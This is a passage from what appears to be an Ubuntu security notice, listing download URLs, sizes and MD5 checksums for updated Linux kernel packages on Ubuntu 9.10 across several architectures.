http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:     8154 f2d765541e008431b4d3eae00f435b61

Updated packages for Ubuntu 9.10:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.dsc
  Size/MD5:     2450 610bb83247876f8a8b47a0fd0d46fae8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.tar.gz
  Size/MD5: 87052080 62b9dcb9ad24e659db1aa085f9e5a456
http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.dsc
  Size/MD5:     1906 a39c7ff46fb3ff74480d0e98366a486d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.tar.gz
  Size/MD5: 81902928 c9e88b4f386710c3f22979986a7e3a34
http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.dsc
  Size/MD5:     1943 25176b20de251c2e58bb95e2dd9c1c7b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.tar.gz
  Size/MD5: 82470873 4d5238d3d11105852133d3eb802a95cc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.diff.gz
  Size/MD5:  2811600 b2b44f12a786758d470e6a29c09d0388
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.dsc
  Size/MD5:     3782 ae6bf5844769d00004b919a6f61d588c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz
  Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.31-304.10_all.deb
  Size/MD5:  3790328 e35ab5c36ee1bac625d2a57bd19e0c5c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.31_2.6.31-304.10_all.deb
  Size/MD5: 64258256 70b947cc9e9012c9472f2c317f11ffae
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304_2.6.31-304.10_all.deb
  Size/MD5:  9662096 ac58cebef695901ea01bc7413b79109f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.31-19.56_all.deb
  Size/MD5:  3791668 3836f273873fedf9d2293ee0d11df6ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19_2.6.31-19.56_all.deb
  Size/MD5:  9531414 34d882276f33b0e37135c379a6e1c451
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.31_2.6.31-19.56_all.deb
  Size/MD5: 62161518 9d3f3f79b9f14db8bd3dc68594eb8c8c

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_amd64.deb
  Size/MD5:   603212 951db7e930eefc5fff9017c56badfb6e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_amd64.deb
  Size/MD5: 18660056 e39dda7f87b093e927c34a928b842c7a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   221398 682a7dab5b571a7b2fd31f19daf724c1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    15536 55206db30b20aea4d7da38b342fc095d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    52128 1cde23d38ba6908e1123951ef4bc3c69
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    44828 94402e34a45cf232ae86f3cc08bf7f4f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    50072 65e128949b6f525d9028187fe1e7cc37
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    92518 338960088cec6b9b25ef2a96e96f3ebc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    37776 452d9c073d191ec2be1cad3aceb34490
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   537676 6bb8167794701151c613afe28a5c62c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   130666 ff5cf8923b89d0fa4b5c3c4a61ef93f7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    53846 ffdc544c68e862a0a3038c99ac2d73a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   310118 c2092f9a83a4f59145005f2c451d304b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:  4353666 3a04bb875ae70561075d05d5bb208977
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_amd64.deb
  Size/MD5:   694766 85017cb531a49ea743cb7b30341b5ffa
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-server_2.6.31-19.56_amd64.deb
  Size/MD5:   694938 550a64d6d54ee5f34f1fb9eefbd4cc3e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_amd64.deb
  Size/MD5: 28924984 3001e6d36f6bf76621997bdbeb864234
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-server_2.6.31-19.56_amd64.deb
  Size/MD5: 28885946 ff6296f4c684dd9facb011fc51b0b6f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_amd64.deb
  Size/MD5: 11740736 287948976d92a7cae832a34ce33a99b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_amd64.deb
  Size/MD5:   743052 35cb9d5d80b77a2586d08ffb65d3212a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   168272 fc4758b6b91802971538d3a3c519056d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   202768 73cfe4be43d350582d171ff0e178b6b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    27268 ae850a5e0ba4381a290b8f21ff88737f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   311688 3dab8c023e4aad0df74c5193aeaca49b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:  2282064 f09b0e8828effab3770bfc1da159a8f2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   158666 6765112bf6fed248c08465e47b4dab00
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   203112 fed91a4bc3d356a5a9bb1c6110337413
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   161072 faec6563ccef41e925482b36619fca7c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    38056 505cbeb1fdbf55eea7664a19dcedc11f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:     5762 a3ba57f83594477b27886cb3f4bd1b0d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    73750 53978367ed22b3daba246878064b72c2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    22240 8a1036af3dacffb432813cc8422f6ae8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:     9548 f1e71c2129cc33f1ff139401b7b81547
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    39844 48e4aa79753fdb3ce1877ca1817b9fc6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    23484 f1be46cb2947ebe6b6d2e5b571d71a35
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:  1389556 2ba51ea53e5454f75c8b39f21481e45d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    47382 89f1dff9282f3c667cf1b8c2bc41353c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    51636 41311bd8c8459ba04789539733e6ff5c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   128972 9697c034ed2bb74b5d18c5ae31fe1af0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    15814 8f46e8ddd6cac16dbdbc7c89cc94bee0

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_i386.deb
  Size/MD5:   573528 fa913abed6caeb5c33eb2167f730956f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_i386.deb
  Size/MD5: 17943372 803487f6122441604ec3062e7bb98228
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   198832 3282a330510666a582f6b8c0269d2f53
http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    32458 03e2d90ce28677b7956fa2a72726d02e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    49938 c0d1953d9212f1569f04e8c8ba0db7ca
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    42118 db5bcc80727cd1013bc8393df2a88e4c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    45954 2d497ad958e7e7fc1b57ce51ff6b3570
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    87386 8e3ab58cf14ac0e97a334a65ae3e42ba
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    33754 bdbf52c3d681cca0ecdced183d2d37c4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   534176 5f166aa72d31a95df7cdb60abe4a0fc2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   128172 821c97524ce74e0685b135140c5261d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    49748 9423b0562b984b85856d219d7b67fa27
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   295726 0736ef03d01a5e5e4fdf284ad2be5409
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:  4185460 831a6068ef18d08ff697df14dead1668
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-386_2.6.31-19.56_i386.deb
  Size/MD5:   674832 6c28f2a428900b7c3ecd857dd2363150
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb
  Size/MD5:   674164 daade678beff67e96da61f42286bb8d4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_i386.deb
  Size/MD5:   674252 0786c96b6d902a71c6f1a2e5aa202345
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-386_2.6.31-19.56_i386.deb
  Size/MD5: 28775482 99e9b99d437aa88ec42e838367ca0c3b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb
  Size/MD5: 28938194 19d1d147a9e9dfb49fcd30b9d065d289
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_i386.deb
  Size/MD5: 28836780 00047de0d649be8b91c813fe7ee482b7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_i386.deb
  Size/MD5: 11193984 1848c77671f6d9129f990e1a0a9940d0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_i386.deb
  Size/MD5:   743050 af6030dae8f05d7ef583ee7d6f31be8b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   172774 c11dd36baffeccf283ce48e122d7c791
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   186104 072e07c277b4f37611b21aad4390ccb0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    28372 82c8b14ef6982a48d3a8459d56ede43c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   292792 6c99c3b65ff7b159af94edf70358cb4a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:  2400232 94729dcb0c5adb15ded7b3302c4005eb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   142004 9e43481b4e46409d8e711a628ce5e40a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   189566 83afe6de56cab613b4f890723a82a6b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   148522 b96767af921427e880579659ba7b757a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    35306 a6a1cbe7a75490632f24cad479916315
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:     6842 86b286685eabaf8b6d28d3f922249503
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    86058 c014cfa81ab99a01793d25b995c7d75f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    46424 d525bcf1a39f6a21f09d52d24e6a0eb3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:     8916 f9efb7f192c3cc22c14df58803a64dfc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    36282 1d843fa9ef5beed8582f2924d0b53bcc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    21660 3ad0b4572c12885957a3b753fc3b9fe3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:  1495010 630f37fe420a74a22b4ca2eba4960999
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    44088 fddf56b0285ec3d0e6fc61e0fe8b86e2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    48484 2614a20d6d57892a8789091eeeaa67b3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   117810 ff004889bca11286287a59c36fa24c0e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    14526 4c9cb3d5598c843bf5b90ddf0292d3c1

lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   198810 76156647956f29c9e519aeac038c63bb
http://ports.ubuntu.com/pool/main/l/linux/char-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    32452 9a5dd5fe15dda0be28f7afd966e89af9
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    49936 31c4008b50016b2a6c3a90703f2becbb
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    42148 931518b24b123d3749719c35b2b23759
http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    45950 297c686f52a35049b3b2c87a96aebf68
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    87366 ec3f16cc0aeeef91b8c887ff347b6b0a
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    33750 a29ddd339c071c5b948c96e30f36f650
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   534366 b15b19f3e6c581d22514700dbd6502d8
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   128202 3d0f559a80187074bb210e3dae3bbfa0
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    49732 41abb7e30f0bdac62c5cd064c4b0ac3e
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   295732 12e912ce1f15d580960e7956de0c4ae0
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:  4186814 7c18e86a3f5a5a985488ad67718887f9
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-lpia_2.6.31-19.56_lpia.deb
  Size/MD5:   674880 5dd2779cd5be613c330b7dc35410f271
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-lpia_2.6.31-19.56_lpia.deb
  Size/MD5: 28831528 8eaab1870eda62e8ee231e429c361455
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_lpia.deb
  Size/MD5:   742994 99d2d0609d9032e2810e19c92fc92834
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   172836 8b15eb5579853f45dc49055351df4225
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   186092 0eb0ceb5c23748d829f3e1d7977a35be
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    28366 0301ac544cf27b3dce660787d7575804
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   292736 16e84844c99e73b4e00419c38d78db3d
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:  2400366 43dda8f1a10775e382e7a328381265db
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   141998 930123e6b57798468d7085ae9f549150
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   189564 8d6e18aedb4b970a3643207b96589863
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   148506 78efdbf1323c68be564ad06205842cb6
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    35300 054cf95e7af87d6f744b69eb8166f275
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:     6828 5dbf32d40e88f471614e5cf286670e8f
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    86054 f24e7eaa3608985960e54a9048a24fb6
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    46410 80945eba79f53965effd546d23a8560b
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:     8906 e1c6021a615a4363dde2cf4a893fa53b
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    36270 eb2848e19ec2351b9102bc640e546991
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    21660 cfb271e26dfd127871f5d27547e0a7ba
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:  1494736 44113d529e3f4d3828f8719facd86370
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    44068 98817942a8188bd9281def20a1d327bb
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    48474 ebc9e58b5f98182006d6e3bb9c5ce179
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   117786 9b864dfc32d19a8cf2d61a68894835e9
http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    14524 9ad51e3871197eb84b193bd9a3b29ec2

powerpc architecture (Apple Macintosh G3/G4/G5):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   321488 509ad8549565d0d87fe246df5b26c7af
http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   263628 b7028cc16ec749cc2fdd86e985c7bc6a
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    58850 3e2f18df29a75debc326e5919c9c13da
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    67040 8fdde64943d01e5c6a372424d3d24a03
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    45914 6a21bb6fc6dce2767be6f974ffdab524
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    51296 4c928d4f04bf96f5cdc5ccf7d3a60c81
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    90684 eac2ea55da023924723593afffbb5d2c
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   105146 c407a156a5e56f284fa682d87d2ed50e
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    39492 38f377d5a0bdbbbb642545aa6d7f641c
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    39270 47f890e2a1418595d92858350aa16475
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   580998 825045ff82a442eaf1a21a5448b0cefb
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   626388 b56b5416b642ba57471e6e125b99a32f
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   149292 930001a305b0f78060f3472fe46cde00
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   147332 ef6994c30f19462a7fc0cb7cd8f4dacc
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    79750 75c6da2308e05334f89f62917aee5b3d
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    84136 caf2a7e924b03340e579e9bdc0a7ba50
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   402954 9fc3d4860f5c32aff3ac252379938fef
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   342516 5737df8ea2adfc45ecae9d322931187a
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  3813204 3ac91a51b3525bfbb0f6166fc140d7db
